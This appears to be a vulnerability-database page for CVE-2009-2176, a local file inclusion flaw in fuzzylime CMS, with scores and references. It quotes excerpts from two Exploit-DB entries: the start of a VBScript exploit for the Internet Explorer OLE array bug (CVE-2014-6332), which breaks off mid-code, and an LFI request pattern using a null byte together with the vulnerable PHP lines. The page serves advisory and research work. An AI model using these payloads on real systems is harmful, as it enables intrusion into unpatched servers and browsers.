CVE-2009-2176
published 2009-06-23CVE-2009-2176: Multiple directory traversal vulnerabilities in fuzzylime (cms) 3.03a and earlier, when magic_quotes_gpc is disabled, allow remote attackers to include and…
PriorityP346high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
7.39%
93.7th percentile
Multiple directory traversal vulnerabilities in fuzzylime (cms) 3.03a and earlier, when magic_quotes_gpc is disabled, allow remote attackers to include and execute arbitrary local files via directory traversal sequences in the (1) list parameter to code/confirm.php and the (2) template parameter to code/display.php.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| fuzzylime | fuzzylime_cms | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Microsoft Internet Explorer 11 - OLE Automation Array Remote Code Execution (1)
exploitdb·2014-11-13
CVE-2014-6332 Microsoft Internet Explorer 11 - OLE Automation Array Remote Code Execution (1)
Microsoft Internet Explorer 11 - OLE Automation Array Remote Code Execution (1)
---
//*
allie(win95+ie3-win10+ie11) dve copy by yuange in 2009.
cve-2014-6332 exploit
https://twitter.com/yuange75
http://hi.baidu.com/yuange1975
*//
function runmumaa()
On Error Resume Next
set shell=createobject("Shell.Application")
shell.ShellExecute "notepad.exe"
end function
dim aa()
dim ab()
dim a0
dim a1
dim a2
dim a3
dim win9x
dim intVersion
dim rnda
dim funclass
dim myarray
Begin()
function Begin()
On Error Resume Next
info=Navigator.UserAgent
if(instr(info,"Win64")>0) then
exit function
end if
if (instr(info,"MSIE")>0) then
intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2))
else
exit function
end if
win9x=0
BeginInit()
If Create()=True Then
myarray= chrw(01)&chrw(2176)&chrw(01)&chr
Exploit-DB
Fuzzylime CMS 3.03a - Local Inclusion / Arbitrary File Corruption
exploitdb·2009-06-17
CVE-2009-2177 Fuzzylime CMS 3.03a - Local Inclusion / Arbitrary File Corruption
Fuzzylime CMS 3.03a - Local Inclusion / Arbitrary File Corruption
---
+------------------------------------------------------------------------+
| fuzzylime cms <= 3.03a local inclusion / arbitrary file corruption poc |
+-----------+------------------------------------------------------------+
| by staker |
+-----------+---------------------+
| mail: staker[at]hotmail[dot]it |
| url: http://cms.fuzzylime.co.uk |
+---------------------------------+
[1][LFI]
http://[target]/[path]/code/confirm.php?e[]&list= { file + nullbyte }
Vulnerable code: confirm.php (local file inclusion mq=off)
1. <?
2. @extract($HTTP_GET_VARS); <-------- {1}
3. @extract($_GET); <----------^
27. elseif(isset($e)) { <------- {2}
28. $filename = "code/mailing/$list.inc.php"; <------- {3}
29. @include $filename; <
No writeups or analysis indexed.
http://osvdb.org/55182http://osvdb.org/55183http://secunia.com/advisories/35489http://www.securityfocus.com/bid/35418https://exchange.xforce.ibmcloud.com/vulnerabilities/51205https://www.exploit-db.com/exploits/8978http://osvdb.org/55182http://osvdb.org/55183http://secunia.com/advisories/35489http://www.securityfocus.com/bid/35418https://exchange.xforce.ibmcloud.com/vulnerabilities/51205https://www.exploit-db.com/exploits/8978
2009-06-23
Published